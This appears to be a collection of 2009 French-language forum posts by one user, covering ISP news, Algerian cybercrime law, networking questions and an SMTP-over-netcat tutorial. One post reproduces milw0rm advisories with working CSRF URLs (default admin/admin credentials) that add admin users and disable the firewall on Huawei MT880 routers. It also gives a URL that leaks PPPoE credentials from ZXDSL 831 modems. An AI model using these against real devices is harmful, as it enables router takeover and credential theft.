abitaf

Le Japon, en matière de déploiement de fibre optique, est en avance. Très en avance. On le sait. Aux dernières nouvelles, le Japon compterait plus de 13 millions d'abonnés à la fibre, contre, par exemple, 1 petit million en Europe... NTT, l'opérateur historique nippon, outre son déploiement massif sur le sol japonais – ce qui lui permet par ailleurs de capter environ 90 % des abonnés fibrés – ne se repose pas sur ses lauriers, puisqu'il vient d'annoncer aujourd'hui une toute nouvelle offre : du 200 Mbps en débit descendant (téléchargement), soit le double des offres classiques pour ce type de technologie. Disponible dès demain pour certains Tokyoïtes, cette super ligne Internet devrait pousser un peu plus encore les Japonais à abandonner l'ADSL, technologie surpassée par la fibre optique (en quantité d'abonnés) depuis cette année vous rappelait-on récemment. Sachant que près de 90 % de la population peut d'ores et déjà être fibrées au Japon, de nombreuses prévisions prévoient que le pays du soleil levant comptera entre 22 et 30 millions d'abonnés à la fibre d'ici 2013-2015.

le plus simple c d'allé sur NAT puis hote dmz puis dans Adresse IP de hôte DMZ:entre l'ip du pc sa a pour consequence d'ouvrir tout les port

1) la preumiere pour le Huawei MT880 Description: Huawei MT880 is a device offered by the algerian telecom operator - FAWRI, to provide ADSL Internet connexion and it's already widely in use. Overview: Huawei MT880 firmware and its default configuration has flaws, which allows LAN users to gain unauthorized full access to device. Here are just limited PoCs. Default credentials on the web-based management interface: admin/admin Possible XSRFs: Adding an administrator user: http://admin:admin@192.168.1.1/Action?user_id=jerome&priv=1&pass1=jerome&pass2=jerome&id=70 Disabling firewall/anti-DoS... features: http://admin:admin@192.168.1.1/Action?blacklisting_status=1&bl_list=10&attack_status=0&dos_status=0&id=42&max_tcp=25&max_icmp=25&max_host=70 Adding a MAC address to the whitelist: http://admin:admin@192.168.1.1/Action?insrcmac66=123456789123&inblocksrcmac66=1&insrcmac67=000000000000&inblocksrcmac67=1&insrcmac68=000000000000&inblocksrcmac68=1&insrcmac69=000000000000&inblocksrcmac69=1&insrcmac70=000000000000&inblocksrcmac70=1&insrcmac71=000000000000&inblocksrcmac71=1&insrcmac72=000000000000&inblocksrcmac72=1&insrcmac73=000000000000&inblocksrcmac73=1&insrcmac74=000000000000&inblocksrcmac74=1&insrcmac75=000000000000&inblocksrcmac75=1&insrcmac76=000000000000&inblocksrcmac76=1&insrcmac77=000000000000&inblocksrcmac77=1&insrcmac78=000000000000&inblocksrcmac78=1&insrcmac79=000000000000&inblocksrcmac79=1&insrcmac80=000000000000&inblocksrcmac80=1&insrcmac81=000000000000&inblocksrcmac81=1&id=104 Adding an IP address allowed by the firewall: http://admin:admin@192.168.1.1/Action?ip_1=192&ip_2=168&ip_3=1&ip_4=2&mask_1=255&mask_2=255&mask_3=255&mask_4=255&gateway_1=192&gateway_2=168&gateway_3=1&gateway_4=1&id=7 Over flaws are not covered in this advisory. Cheers /JA # milw0rm.com [2009-08-24] 2) la deuxieme pour le ZXDSL 831 ----------------------------------------------------- -->> Found By SuNHouSe2 [ALGERIAN HaCkEr] --> Made in "Maghnia City" (DZ) --> Contact : sunhouse2@yahoo.com --> Greetz to : His0k4 all my friends --> Good Ramadan to all muslims ----------------------------------------------------- Exploit tested on modem with this informations : ZTE CORPORATION Date : NOV 2008 Product : ADSL Modem Model : ZXDSL 831 II --> http://www.geeksecurity.org/tsttte.JPG Firmware Version : ZXDSL 831IIV7.5.0a_E09_OV ----------------------------------------------------- Introduction: This modem is used by many providers in the world like russia india and algeria [used by provider and all clients of "Easy ADSL"]. Exploit : We can get access to to configuration of the modem , and get PPPOE user & password. Go only here http://192.168.1.1/vpivci.cgi A video uploaded to explain how we can use this exploit to get PPPOE sessions with user & password download video demonstration > http://www.geeksecurity.org/vid/zxdsl%20exploit.rar http://www.geeksecurity.org/vid/zxdsl-exploit-2.rar ------------------------------------------------------ # milw0rm.com [2009-08-18]

source : La Dépêche de Kabylie Malgré une connexion médiocre Algérie Telecom a augmenté ses abonnements à Internet Les citoyens se rendant depuis quelques semaines à Algérie Telecom pour renouveler leur abonnement ont été surpris de voir les tarifs de connexion au haut débit augmenter de plus de 3 000 DA, passant de 6666 DA pour un abonnement à Fawri d’une capacité de 256 kbps pour une durée de six mois à 9990 DA pour la même durée. Les responsables de l’agence Aïssat Idir n’ont pas daigné nous recevoir pour expliquer cette hausse surtout après les réclamations des citoyens quant à une connexion lente et médiocre. Il faut souligner que cette opération, au début, a connu un vif succès, ce qui a conduit à une pénurie de modems dans la prestation Fawri qui proposait même un mois gratuit pour un abonnement de six mois ainsi que la grtauité du modem. Il s’est avéré que certains modems étaient défectueux et la connexion était assez lente pour un abonnement de 512 kbps, les clients n’ayant pas cessé de se plaindre surtout avec les déconnexions fréquentes du réseau. Algérie Telecom joue la carte du rapport qualité-prix, néanmoins et d’après l’amère expérience de certains clients “cette opération ne vaut pas le coup”. Pour les réclamations, l’agence Aïssat Idir sort son arme préférée, le mépris. Sur les lieux, des personnes venues simplement se renseigner se retrouvent face à un mutisme généralisé de la part des agents dont le comportement frôle le mépris sans parler des préposés aux guichets qui provoquent des files d’attente vu qu’ils ont trouvé mieux à faire, discuter des plats qu’ils prépareront pour le soir. Quant à la caisse, le trésorier vous fait attendre un long moment vu qu’il est absent et une fois arrivé, il vous demande la monnaie pour payer votre facture. Pour les connexions, il faut attendre plus de 15 jours pour être raccordé au réseau. On vous demande alors d’appeler le 100 pour la configuration de votre modem, néanmoins ce numéro est toujours injoignable malgré l’insistance. Pour les quelques personnes qui ont des connaissances, on leur fait la configuration sur place. Aussi, il y a cette pratique scandaleuse qui consiste à faire passer sa connaissance (amis, familles…) avant tout le monde malgré la queue. Connexion médiocre, anarchie, prestations (accueil, orientation et services) et tarifs devenus peu abordables, vu leur augmentation par Algérie Telecom, une entreprise cacophonique qui perd de sa valeur. Il est temps de revoir tout cela en fidélisant la clientèle et en standardisant les prestations et le rapport qualité-prix, surtout qu’aucune explication ne nous a été fournie pour justifier l’augmentation des tarifs ces deux derniers mois. Hacène Merbouti

merci pour le proxy tres rapide par rapport a ceux que g essayé. ;-) mais pourquoi eepad block des site normale ?

g constaté c dernier jours que plusieurs site dont j'accedé auparavent ne marche plus est-ce que c le cas pour vous ? par exemple : http://fixounet.free.fr/avidemux/ dite moi si il marche et aussi j'arrive pas a telechargé la derniere version de supercopier http://sfxteam.free.fr/SuperCopier22beta.exe si qqn arrive a la telechargé est-ce qu'il peu me l'envoyé par mail abitaf@gmail.com

maintenant on peut dire 100% bladi puisque sa devient une LFS

http://www.todaysbigthing.com/2009/08/05

Est-ce qu'il ya un test de pratique lors de l'examen ? Qu’elle est la différence entre l'académique et le diplôme finale ? Je me rappel que qqn ma dit que pour le diplôme finale réussie en t'envoie un badge depuis les états unis avec un numéro et n’ importe où dans le monde celui qui entre ce numéro sur le site Cisco peu voire ton profil et les certificats passé ? Par contre pour l'académique il n ya pas de badge ; est-ce que qqn peut me confirmé ca ?

question : est-ce que l'examen ici en algerie se passe en anglais ou en francais ?

merci beaucoup mon frère

CYBERCRIMINALITE- APN: Les députés s'inquiètent pour les libertés individuelles Publier le : 27-06-2009 Le projet de loi relatif aux règles particulières sur la prévention et la lutte contre les infractions liées aux technologies de l'information et de la communication a été exposé hier devant les députés. Ce projet de loi, comprenant 19 articles, est scindé en cinq chapitres. Il s'agit du contrôle, de la prévention, de l'inspection et de la saisie des systèmes et matériels informatiques. Ce projet a prévu en outre la mise en place d'un organisme national pour la prévention et la lutte contre la cybercriminalité. Cette structure aura pour mission de coordonner toutes les actions entreprises par la justice, les services de sécurité et tous les intervenants dans cette mission et même avec des organismes étrangers de même nature. A signaler que ce projet de loi revêt un caractère particulier d'autant que l'utilisation du réseau à des fins criminelles est devenu un sport mondial. D'ailleurs, les spécialistes ont maintes fois tiré la sonnette d'alarme. Le ministre de la Justice a, en répondant hier aux propositions des députés, dit que ce texte est perfectible, sachant que la cybercriminalité se développe à une vitesse vertigineuse et le réseau des réseaux devient même une menace pour la stabilité des pays. Le garde des Sceaux a rassuré, par ailleurs, les représentants du peuple quant à la préservation et la protection des libertés individuelles et publiques. M. Belaïz a précisé, sur ce point, que le texte en question prend en considération l'équilibre entre les libertés individuelles et la sécurité du pays. Expliquant les contours de ce texte juridique, il a soulevé le caractère rapide de la cybercriminalité d'où l'importance de la prévention qui est le premier chapitre du texte. Il a parlé aussi dans son intervention de l'organisme prévu dans cette loi, lequel sera un centre de coordination entre toutes les parties concernées. Les députés ayant intervenu, hier, au nombre de 17, ont mis en exergue l'importance de cette loi qui vient combler un vide juridique. Les représentants du peuple ont proposé d'autres mesures pouvant compléter ce texte juridique. Certains ont estimé que le projet manquait d'articles répressifs et pénaux à l'encontre des cybercriminels. Ils ont soulevé en effet l'incidence de cette loi sur les libertés individuelles et publiques. En ce sens que le contrôle des données informatiques pourrait nuire à certaines libertés. Parmi les points ayant attiré l'attention des représentants du peuple figure celui de la formation des magistrats pour faire face à ce genre de criminalité qui est nouveau dans la société algérienne. D'ailleurs, certains ont proposé dans ce sillage de mettre en place une liste noire des sites dangereux et qui doit être actualisée régulièrement. Cette liste, selon un député, pourrait aider les services de sécurité à freiner un tant soit peu l'influence du Net sur les couches sensibles de la société, notamment les jeunes et les adolescents, et protéger ces couches contre les sites pornographiques. Par : Smaïl Boughazi Source : EL MOUDJAHID

Comment Envoyer un mail avec le smtp de gmail En ligne de commande : Si vous ouvré votre boite email pour envoyé un mail a quelqu’un alors Le protocole smtp est le responsable de l’acheminement de votre mail vers le destinataire souhaité . Et si vous avez utilisé une application de gestion de mail comme thunderbird ; Outlook … Alors pour les configure vous devrai avoir l’adresse du serveur smtp. Celui de gmail est : smtp.gmail.com Dans ce tutorial nous allons envoyé un mail en ligne de commande Pour ce connecter a un serveur il existe des commandes comme telnet et netcat www.securityforest.com/downloads/nc.exe Netcat pour Windows Exemples : Dans ce qui suit les commandes seront en bleu et les réponse en vert. Apres la connexion au serveur il attend que vous tapé des commandes Il existe plusieurs commandes smtp celle qu’on va utilisé le plus sont : HELO (ou EHLO) /* identification auprès du serveur */ AUTH LOGIN /* authentification */ MAIL FROM: /* adresse de l’expéditeur */ RCPT TO: /* adresse du destinataire */ DATA /* message a envoyé */ QUIT /* Bye Bye */ Donc la première commandes après la connexion c EHLO il faut dire bonjour au serveur Sinon il ne répond pas , dans notre cas c sans paramètre mais on peu dire bonjour et Donné son nom de domaine ou une IP : EHLO 193.194.89.5 ; ou EHLO usthb.dz Pour la suite on peu soit s’authentifié soit commencé l’envoie de mail Avec la commande MAIL FROM : dans le cas de gmail on est obligé de s’authentifie a l’ aides des information de son compte. car gmail interdit les mail anonymes mais il existe des serveur qui autorise les mails anonymes c cela qu’utilise les spammeur. Donc la suite c : Apres avoir demandé l’authentification gmail nous répond quand doit faire STARTTLS cad initialisé une connexion crypté. Donc j’exécute STARTTLS puis je refais AUTH LOGIN , ici la connexion est rompu par Le serveur , c normale car netcat ou telnet ne supporte pas le SSL « connexion sécurisé » Il existe des serveurs smtp qui n’utilise pas le SSL pour cela la commande aurai marché et on aurai continué avec MAIL FROM : … mais comme on veux utilisé gmail on va devoir utilisé un autre outil pour initialisé la connexion. Sa sera openssl . sous linux vous devrai installé le paquet openssl et sous Windows il faut le téléchargé a l’adresse http://www.slproweb.com/products/Win32OpenSSL.html après l’avoir installé nous pouvons reprendre se qu’on a fait mais cette fois on initialise la connexion avec la commande : la Réponse du Serveur a cette commande est un peu longue car il initialise une connexion sécurisé. On continue avec EHLO La commande AUTH LOGIN cette fois marche et le serveur attend l’username Mais la problème , est que si on écrit l’username ici par exemple : abitaf le serveur ne va pas comprendre. ceci est du a ce que le serveur attend des information codé en Base64 base64 est un codage principalement utilisé pour la transmission de messages donc nous devons convertir abitaf et MotDePasse en Base64 pour cela il existe des site pour vous aider par exemple : http://home2.paulschou.net/tools/xlate/ dans mon cas abitaf = YWJpdGFm et MotDePasse = TW90RGVQYXNzZQ== nous pouvons maintenant continué : Login accepté ; il est temps d’envoyé notre mail : Apres la commandes DATA le serveur attend votre message , Pour terminé la dernière ligne doit contenir seulement un point. Vous pouvez aussi faire plusieurs RCPT TO : avant DATA pour envoyé un mail A plusieurs personne. La commande Quit termine la connexions. Voila j’espère que se tutorial vous sera utile ;-)

voici la dernière archive du milw0rm, 08 juillet 2009 http://www.backtrack-fr.net/milw0rm/milw0rm.tar.bz2

voici le clone du site : http://inj3ct0r.com/

merci , il faut remercier le gars et lui envoyé des mail d' encouragement .

Milw0rm is dead :-( milw0rm.com was probably one of the top 5 best ******* websites in the world. In a sudden announcement, the website's owner (a.k.a Str0ke) broke the news to the world saying he will no longer have the time to manage and update the website. Fresh exploits, video tutorials, online password cracking and more goodies were offered free of charge at Milw0rm. It is with much regret and sadness that we receieve the news. I would like to use this opportunity to thank Str0ke for the wonderful resources he has put at our disposal, his precious time, knowledge and enthusiasm. You have set new standards for the ******* community at times where greedy security companies offer exploit code and technical advisories for unrealistic amounts of money. Here's the relatively brief explanation for the shutdown by Str0ke: "Well, this is my goodbye header for milw0rm. I wish I had the time I did in the past to post exploits, I just don't . For the past 3 months I have actually done a pretty crappy job of getting peoples work out fast enough to be proud of, 0 to 72 hours (taking off weekends) isn't fair to the authors on this site. I appreciate and thank everyone for their support in the past. Be safe, /str0ke" And a last screenshot of the website's main page: For support emails and thank you's, here's Str0ke's email address: str0ke@milw0rm.com So long and a thousand thanks milw0rm !!

char shellcode[] = "Merci Beaucoup :-)" void main() { int *ret; ret = (int *)&ampret + 2; (*ret) = (int)shellcode; }

tout les liens qui on ete posté regroupé : http://picasaweb.google.fr/UbuntuAlgerie/FirstGNULinuxInstallPartyInAlgeria http://picasaweb.google.fr/UbuntuAlgerie/FirstGNULinuxInstallPartyInAlgeria#5354021425538955746 http://picasaweb.google.com/zino.bts.info/InstallPartyAlger http://picasaweb.google.com/zino.bts.info/CZinoDeMaghnia http://ktalgerie.blogspot.com/ http://www.freefoxtv.net/2009/06/30/photos-de-linstall-party-gnulinux-a-lusthb/ http://www.flickr.com/photos/29097474@N06/sets/72157620783495114/show/with/3675807793/ http://ktalgerie.blogspot.com/2009/06/photos-install-party-gnulinux-alger.html http://amarsoftdz.blogspot.com/ http://www.onizo.com/photos_install_party_2009.torrent http://connekt.free.fr/GNU-Linux_Install_Party_Algerie_.torrent http://www.zshare.net/download/62297438b58e7fc7/

source : http://www.siteduzero.com/news-62-33007-p1-r-stallman-ne-veut-pas-de-c-dans-debian.html R. Stallman ne veut pas de C# dans Debian Dernièrement, le projet Debian a décidé d'inclure le framework libre Mono comme dépendance au sein du système de base de sa distribution GNU/Linux. En effet, certains programmes (comme Tomboy, logiciel libre de prise de notes) étaient basés sur ce framework, et Mono était requis pour leur fonctionnement. Pour rappel, Mono est une adaptation libre du framework .NET de Microsoft par Miguel de Icaza, leader du projet Gnome et travaillant chez la société Novell depuis 2003. Mono vise à permettre l'utilisation des technologies .NET sur les plate-formes autres que Windows, donnant ainsi accès aux développeurs du monde Unix aux langages de la plate-forme .NET comme C# ou VB.NET. Qu'est-ce que le C# ? Le langage C# (prononcez « C sharp ») est un langage impératif orienté objet à typage fort, créé par Microsoft et utilisé sur la plate-forme Microsoft .NET (prononcez « Dot Net »). C'est un langage dérivé du C++ mais qui ressemble beaucoup à Java, avec lequel il conserve quelques petites différences, l'une des plus palpables étant la surcharge des opérateurs. Le langage est standardisé, et le code source de certaines bibliothèques du C# a été dévoilé par Microsoft fin 2007. Présentons un petit exemple de "Hello World" Code : C# 123456789using System; class HelloWorld{ public static void Main() { Console.WriteLine("Hello World!"); }} N'existant que sous Windows, le framework .NET a alors été porté par différents projets, parmi lesquels Mono, mais aussi DotGNU, maintenu par la FSF. Quelques projets, libres ou non, utilisent Mono, parmi lesquels Les Sims 3, pour les scripts d'évènements. Banshee, un lecteur de musique sous Gnome. Tomboy, logiciel de prise de notes sous Gnome. PHP4Mono, portage du langage PHP dans sa version 5 sur le framework Mono. Richard Stallman ne veut pas dépendre du C# Cependant, bien que standardisé par les normes ECMA et ISO, le C# est un langage très dépendant de sa bibliothèque standard, qui elle n'est pas normalisée et est surtout brevetée par Microsoft. C'est ainsi le cas pour ASP.NET, ADO.NET ou les Windows Forms, qui permettent de simplifier grandement le développement web, l'accès aux bases de données ou la création d'interfaces graphiques, mais restent sous brevet Microsoft. Richard Stallman Suite à cette annonce, Richard Matthew Stallman, père du projet GNU, a ainsi alerté les développeurs du projet Debian en rappelant que Mono pouvait un jour être mis en danger par l'utilisation de ces brevets, si Microsoft décidait de poursuivre le framework libre. Stallman craint en effet que l'idée vienne un jour à Microsoft d'intenter des procès pour violation de brevet (comme l'a déjà fait la firme de Redmond, par exemple lorsqu'ils ont reproché au fabricant de GPS TomTom d'utiliser le système FAT en violant les brevets associés) sur cette bibliothèque standard et donc que le monde libre perde Mono, Tomboy et tous les projets libres écrits en C# ou VB.NET. Mono étant en partie mené par Novell, les accords de brevets entre Microsoft et cette entreprise protègent le projet, mais seulement pour les développeurs et clients de Novell. Ceci a créé un véritable problème dans le milieu libre : en effet, chaque utilisateur d'un projet libre doit disposer des mêmes droits que tous les autres. Or actuellement, avec ces accords entre les deux entreprises, cette situation n'est absolument pas respectée. Rappelons que si les brevets logiciels sont toujours un sujet difficile en Europe, aux Etats-Unis ils sont reconnus et appliqués. Pour autant, tout le monde dans le monde du logiciel libre ne partage pas l'avis de Stallman. Jo Shields, membre de l'équipe du projet Debian, par exemple, soutient que Mono est indépendant de Microsoft, et que de très bonnes applications peuvent être écrites avec ce framework. Ainsi, s'il est nécessaire à ces applications, et qu'elles méritent d'être intégrées à la distribution, il doit être proposé. Jo Shields critique alors le manque de pragmatisme de certains, qui se contentent d'être contre Mono, sans être suffisamment constructifs. Conclusion Richard Stallman tient donc le raisonnement suivant : pouvoir développer des logiciels libres en C# est une bonne chose, parce que ces logiciels sont libres, c'est donc "mieux que rien". Cependant, ils ne devraient pas pouvoir être mis en danger pour des raisons juridiques, et pour ça l'utilisation de technologies à risque ne devrait pas être encouragée. D'autant que des technologies alternatives existent, tant dans le cas du framework libre Mono que dans celui du logiciel Tomboy, remplaçable par Gnote. Mais on peut opposer à Richard Stallman que la possibilité de développer en utilisant C# ou des technologies proches de .NET reste un atout pour le logiciel libre, qui peut alors intéresser des développeurs Windows. Liens relatifs à la news : Mono sur Wikipedia ( Version anglaise ) Site officiel de Debian L'annonce de Stallman sur le site de la FSF Le C# sur wikipedia Visual C#, l'IDE C# de Microsoft

est-ce qu'il est possible avec le sagem fast 3302 de lui dire de bloquer une ip et de lui laisser que le port 80 ? par example g 3 pc qui se connecte a la maison en wifi a la box sagem 192.168.30.10 192.168.30.11 192.168.30.12 je voudrai pour les deux premier ne laisser que la navigation http et pour la derniere lui permetre tout

est-ce que ça ne serai pas le faite que joomla soit très utilisé qu'il attire l'attention des hacker sur lui. en d'autre terme si par ex SPIP se met a être utilise par tout le monde , c faille de sécurité arriverai au même niveaux de joomla car on s'intéresserait plus a lui ?

http://www.zataz.com/news/19079/facteur--vleur--piege--camera--spy-cam.html